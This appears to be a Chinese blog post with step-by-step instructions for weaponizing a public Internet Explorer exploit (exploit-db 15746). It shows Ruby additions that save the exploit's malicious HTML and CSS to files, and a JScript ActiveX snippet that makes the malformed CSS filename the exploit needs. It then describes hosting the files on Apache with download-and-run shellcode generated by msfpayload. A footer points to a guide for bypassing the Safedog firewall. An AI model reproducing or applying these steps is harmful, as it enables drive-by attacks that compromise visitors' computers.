這個exp用的是http發包的方法,是一個ruby小腳本,萬一同時多人訪問就掛了。所以還要轉成 htm。
原作者為什么要用http發包,估計是沒有解決 css文件名的問題。
漏洞的原理、分析我也不會,我只是改造了這個ruby
一、第一步
在原來的腳本(http://www.exploit-db.com/exploits/15746/),down save下來為15746.rb,editplus打開
break unless http_send(cli, @html, :type=>"text/html")
下邊加上
aFile = File.new("C:\lcx.htm","wb")
aFile.puts @html
aFile.close
運行15746.rb,然后用ie訪問127.0.0.1:55555/test.html就會自動生成lcx.htm
二、第二步
在原來的腳本(http://www.exploit-db.com/exploits/15746/)
break unless http_send(cli, @css, :type=>"text/css")(有兩行,最后一行吧)
下邊加上
aFile = File.new("C:\lcx.css","wb")
aFile.puts @css
aFile.close
當你訪問127.0.0.1:55555,會自動生成lcx.css
三、第三步
我的ruby水平有限,不知如何用ruby生成哪個奇怪的css文件名,我用的js
var fso, f1;
fso = new ActiveXObject("Scripting.FileSystemObject");
f1 = fso.CreateTextFile(decodeURI("s%CD%B3s%CD%B3s%CD%B3s%CD%B3"), true);
運行這個js,會生成一個"奇怪"的文件名。然后用這個文件名改掉原來的lcx.css文件名。
四、第四步
構架環境測試。因為iis不認這個s%CD%B3s%CD%B3s%CD%B3s%CD%B3東東,所以你把生成的lcx.htm和改名的lcx.css傳到apache空間上。測試之前,你可以用editplus打開lcx.htm,換掉里邊的shellcode。我是直接用msfpayload生成一個下載的shellcode的。
下一篇:過安全狗的一種方法